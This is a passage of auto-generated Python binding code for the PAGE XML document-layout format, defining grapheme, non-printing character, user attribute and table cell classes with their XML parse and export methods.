already_processed.add('id')
self.id = value
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
self.validate_indexType2(self.index) # validate type indexType2
value = find_attr_value_('ligature', node)
if value is not None and 'ligature' not in already_processed:
already_processed.add('ligature')
if value in ('true', '1'):
self.ligature = True
elif value in ('false', '0'):
self.ligature = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('charType', node)
if value is not None and 'charType' not in already_processed:
already_processed.add('charType')
self.charType = value
self.validate_charTypeType(self.charType) # validate type charTypeType
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'TextEquiv':
obj_ = TextEquivType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextEquiv.append(obj_)
obj_.original_tagname_ = 'TextEquiv'
# end class GraphemeBaseType
class GraphemeType(GraphemeBaseType):
"""Represents a sub-element of a glyph.
Smallest graphical unit that can be
assigned a Unicode code point."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
]
subclass = None
superclass = GraphemeBaseType
def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, Coords=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("GraphemeType"), self).__init__(id, index, ligature, charType, custom, comments, TextEquiv, **kwargs_)
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GraphemeType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GraphemeType.subclass:
return GraphemeType.subclass(*args_, **kwargs_)
else:
return GraphemeType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def hasContent_(self):
if (
self.Coords is not None or
super(GraphemeType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemeType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GraphemeType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemeType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemeType'):
super(GraphemeType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeType')
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeType', fromsubclass_=False, pretty_print=True):
super(GraphemeType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(GraphemeType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
super(GraphemeType, self).buildChildren(child_, node, nodeName_, True)
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class GraphemeType
class NonPrintingCharType(GraphemeBaseType):
"""A glyph component without visual representation
but with Unicode code point.
Non-visual / non-printing / control character.
Part of grapheme container (of glyph) or grapheme sub group."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
]
subclass = None
superclass = GraphemeBaseType
def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("NonPrintingCharType"), self).__init__(id, index, ligature, charType, custom, comments, TextEquiv, **kwargs_)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, NonPrintingCharType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if NonPrintingCharType.subclass:
return NonPrintingCharType.subclass(*args_, **kwargs_)
else:
return NonPrintingCharType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def hasContent_(self):
if (
super(NonPrintingCharType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NonPrintingCharType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('NonPrintingCharType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'NonPrintingCharType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NonPrintingCharType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='NonPrintingCharType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='NonPrintingCharType'):
super(NonPrintingCharType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NonPrintingCharType')
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NonPrintingCharType', fromsubclass_=False, pretty_print=True):
super(NonPrintingCharType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(NonPrintingCharType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(NonPrintingCharType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class NonPrintingCharType
class GraphemeGroupType(GraphemeBaseType):
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Grapheme', 'GraphemeType', 1, 1, {'name': 'Grapheme', 'type': 'GraphemeType'}, 9),
MemberSpec_('NonPrintingChar', 'NonPrintingCharType', 1, 1, {'name': 'NonPrintingChar', 'type': 'NonPrintingCharType'}, 9),
]
subclass = None
superclass = GraphemeBaseType
def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, Grapheme=None, NonPrintingChar=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("GraphemeGroupType"), self).__init__(id, index, ligature, charType, custom, comments, TextEquiv, **kwargs_)
if Grapheme is None:
self.Grapheme = []
else:
self.Grapheme = Grapheme
self.Grapheme_nsprefix_ = "pc"
if NonPrintingChar is None:
self.NonPrintingChar = []
else:
self.NonPrintingChar = NonPrintingChar
self.NonPrintingChar_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GraphemeGroupType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GraphemeGroupType.subclass:
return GraphemeGroupType.subclass(*args_, **kwargs_)
else:
return GraphemeGroupType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Grapheme(self):
return self.Grapheme
def set_Grapheme(self, Grapheme):
self.Grapheme = Grapheme
def add_Grapheme(self, value):
self.Grapheme.append(value)
def insert_Grapheme_at(self, index, value):
self.Grapheme.insert(index, value)
def replace_Grapheme_at(self, index, value):
self.Grapheme[index] = value
def get_NonPrintingChar(self):
return self.NonPrintingChar
def set_NonPrintingChar(self, NonPrintingChar):
self.NonPrintingChar = NonPrintingChar
def add_NonPrintingChar(self, value):
self.NonPrintingChar.append(value)
def insert_NonPrintingChar_at(self, index, value):
self.NonPrintingChar.insert(index, value)
def replace_NonPrintingChar_at(self, index, value):
self.NonPrintingChar[index] = value
def hasContent_(self):
if (
self.Grapheme or
self.NonPrintingChar or
super(GraphemeGroupType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeGroupType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemeGroupType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GraphemeGroupType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeGroupType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemeGroupType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemeGroupType'):
super(GraphemeGroupType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeGroupType')
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeGroupType', fromsubclass_=False, pretty_print=True):
super(GraphemeGroupType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Grapheme_ in self.Grapheme:
namespaceprefix_ = self.Grapheme_nsprefix_ + ':' if (UseCapturedNS_ and self.Grapheme_nsprefix_) else ''
Grapheme_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Grapheme', pretty_print=pretty_print)
for NonPrintingChar_ in self.NonPrintingChar:
namespaceprefix_ = self.NonPrintingChar_nsprefix_ + ':' if (UseCapturedNS_ and self.NonPrintingChar_nsprefix_) else ''
NonPrintingChar_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NonPrintingChar', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(GraphemeGroupType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Grapheme':
obj_ = GraphemeType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Grapheme.append(obj_)
obj_.original_tagname_ = 'Grapheme'
elif nodeName_ == 'NonPrintingChar':
obj_ = NonPrintingCharType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.NonPrintingChar.append(obj_)
obj_.original_tagname_ = 'NonPrintingChar'
super(GraphemeGroupType, self).buildChildren(child_, node, nodeName_, True)
# end class GraphemeGroupType
class UserDefinedType(GeneratedsSuper):
"""Container for user-defined attributes"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('UserAttribute', 'UserAttributeType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'UserAttribute', 'type': 'UserAttributeType'}, None),
]
subclass = None
superclass = None
def __init__(self, UserAttribute=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if UserAttribute is None:
self.UserAttribute = []
else:
self.UserAttribute = UserAttribute
self.UserAttribute_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, UserDefinedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if UserDefinedType.subclass:
return UserDefinedType.subclass(*args_, **kwargs_)
else:
return UserDefinedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_UserAttribute(self):
return self.UserAttribute
def set_UserAttribute(self, UserAttribute):
self.UserAttribute = UserAttribute
def add_UserAttribute(self, value):
self.UserAttribute.append(value)
def insert_UserAttribute_at(self, index, value):
self.UserAttribute.insert(index, value)
def replace_UserAttribute_at(self, index, value):
self.UserAttribute[index] = value
def hasContent_(self):
if (
self.UserAttribute
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserDefinedType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('UserDefinedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'UserDefinedType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UserDefinedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UserDefinedType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UserDefinedType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserDefinedType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for UserAttribute_ in self.UserAttribute:
namespaceprefix_ = self.UserAttribute_nsprefix_ + ':' if (UseCapturedNS_ and self.UserAttribute_nsprefix_) else ''
UserAttribute_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserAttribute', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'UserAttribute':
obj_ = UserAttributeType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserAttribute.append(obj_)
obj_.original_tagname_ = 'UserAttribute'
# end class UserDefinedType
class UserAttributeType(GeneratedsSuper):
"""Structured custom data defined by name, type and value."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('name', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('description', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'typeType3', 0, 1, {'use': 'optional'}),
MemberSpec_('value', 'string', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, name=None, description=None, type_=None, value=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.name = _cast(None, name)
self.name_nsprefix_ = None
self.description = _cast(None, description)
self.description_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.value = _cast(None, value)
self.value_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, UserAttributeType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if UserAttributeType.subclass:
return UserAttributeType.subclass(*args_, **kwargs_)
else:
return UserAttributeType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_description(self):
return self.description
def set_description(self, description):
self.description = description
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_value(self):
return self.value
def set_value(self, value):
self.value = value
def validate_typeType3(self, value):
# Validate type typeType3, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['xsd:string', 'xsd:integer', 'xsd:boolean', 'xsd:float']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on typeType3' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserAttributeType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('UserAttributeType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'UserAttributeType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UserAttributeType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UserAttributeType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UserAttributeType'):
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
if self.description is not None and 'description' not in already_processed:
already_processed.add('description')
outfile.write(' description=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.description), input_name='description')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.value is not None and 'value' not in already_processed:
already_processed.add('value')
outfile.write(' value=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.value), input_name='value')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UserAttributeType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
value = find_attr_value_('description', node)
if value is not None and 'description' not in already_processed:
already_processed.add('description')
self.description = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_typeType3(self.type_) # validate type typeType3
value = find_attr_value_('value', node)
if value is not None and 'value' not in already_processed:
already_processed.add('value')
self.value = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class UserAttributeType
class TableCellRoleType(GeneratedsSuper):
"""Cell position in table starting with row 0Cell position in table
starting with column 0Number of rows the cell spans (optional; default
is 1)Number of columns the cell spans (optional; default is 1)
Is the cell a column or row header?"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('rowIndex', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('columnIndex', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('rowSpan', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('colSpan', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('header', 'boolean', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, rowIndex=None, columnIndex=None, rowSpan=None, colSpan=None, header=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.rowIndex = _cast(int, rowIndex)
self.rowIndex_nsprefix_ = None
self.columnIndex = _cast(int, columnIndex)
self.columnIndex_nsprefix_ = None
self.rowSpan = _cast(int, rowSpan)
self.rowSpan_nsprefix_ = None
self.colSpan = _cast(int, colSpan)
self.colSpan_nsprefix_ = None
self.header = _cast(bool, header)
self.header_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TableCellRoleType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TableCellRoleType.subclass:
return TableCellRoleType.subclass(*args_, **kwargs_)
else:
return TableCellRoleType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_rowIndex(self):
return self.rowIndex
def set_rowIndex(self, rowIndex):
self.rowIndex = rowIndex
def get_columnIndex(self):
return self.columnIndex
def set_columnIndex(self, columnIndex):
self.columnIndex = columnIndex
def get_rowSpan(self):
return self.rowSpan
def set_rowSpan(self, rowSpan):
self.rowSpan = rowSpan
def get_colSpan(self):
return self.colSpan
def set_colSpan(self, colSpan):
self.colSpan = colSpan
def get_header(self):
return self.header
def set_header(self, header):
self.header = header
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableCellRoleType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TableCellRoleType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'TableCellRoleType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TableCellRoleType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TableCellRoleType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TableCellRoleType'):
if self.rowIndex is not None and 'rowIndex' not in already_processed:
already_processed.add('rowIndex')
outfile.write(' rowIndex="%s"' % self.gds_format_integer(self.rowIndex, input_name='rowIndex'))
if self.columnIndex is not None and 'columnIndex' not in already_processed:
already_processed.add('columnIndex')
outfile.write(' columnIndex="%s"' % self.gds_format_integer(self.columnIndex, input_name='columnIndex'))
if self.rowSpan is not None and 'rowSpan' not in already_processed:
already_processed.add('rowSpan')
outfile.write(' rowSpan="%s"' % self.gds_format_integer(self.rowSpan, input_name='rowSpan'))
if self.colSpan is not None and 'colSpan' not in already_processed:
already_processed.add('colSpan')
outfile.write(' colSpan="%s"' % self.gds_format_integer(self.colSpan, input_name='colSpan'))
if self.header is not None and 'header' not in already_processed:
already_processed.add('header')
outfile.write(' header="%s"' % self.gds_format_boolean(self.header, input_name='header'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableCellRoleType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('rowIndex', node)
if value is not None and 'rowIndex' not in already_processed:
already_processed.add('rowIndex')
self.rowIndex = self.gds_parse_integer(value, node, 'rowIndex')
value = find_attr_value_('columnIndex', node)
if value is not None and 'columnIndex' not in already_processed:
already_processed.add('columnIndex')
self.columnIndex = self.gds_parse_integer(value, node, 'columnIndex')
value = find_attr_value_('rowSpan', node)
if value is not None and 'rowSpan' not in already_processed:
already_processed.add('rowSpan')
self.rowSpan = self.gds_parse_integer(value, node, 'rowSpan')
value = find_attr_value_('colSpan', node)
